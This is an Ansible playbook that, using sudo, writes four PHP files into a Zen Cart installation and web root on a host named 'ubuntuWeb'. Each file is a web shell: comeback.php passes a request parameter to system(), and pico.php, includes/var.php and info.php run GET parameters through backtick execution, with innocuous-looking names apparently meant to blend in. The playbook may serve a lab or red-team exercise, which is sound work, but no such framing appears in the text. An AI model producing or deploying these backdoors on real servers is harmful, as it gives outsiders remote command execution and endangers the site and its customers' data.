- hosts: ubuntuWeb
  become: true
  become_method: sudo
  ignore_errors: true
  tasks:
    - name: Create web directory
      file:
        path: /var/www/html/web_directory
        state: directory
        mode: "0755"

    - name: Create comeback.php file
      copy:
        dest: /var/www/html/zen-cart/comeback.php
        content: "<?php if(isset(\$_REQUEST['comeback'])){ echo \"<pre>\"; \$cmd = (\$_REQUEST['comeback']); system(\$cmd); echo \"</pre>\"; die; }?>"

    - name: Create pico.php
      copy:
        dest: /var/www/html/zen-cart/pico.php
        content: "<?=\`\$_GET[_]\`?>"

    - name: Create var.php
      copy:
        dest: /var/www/html/zen-cart/includes/var.php
        content: "<?=\`\$_GET[var]\`?>"

    - name: Create info.php
      copy:
        dest: /var/www/html/info.php
        content: "<?=\`\$_GET[0]\`?>"
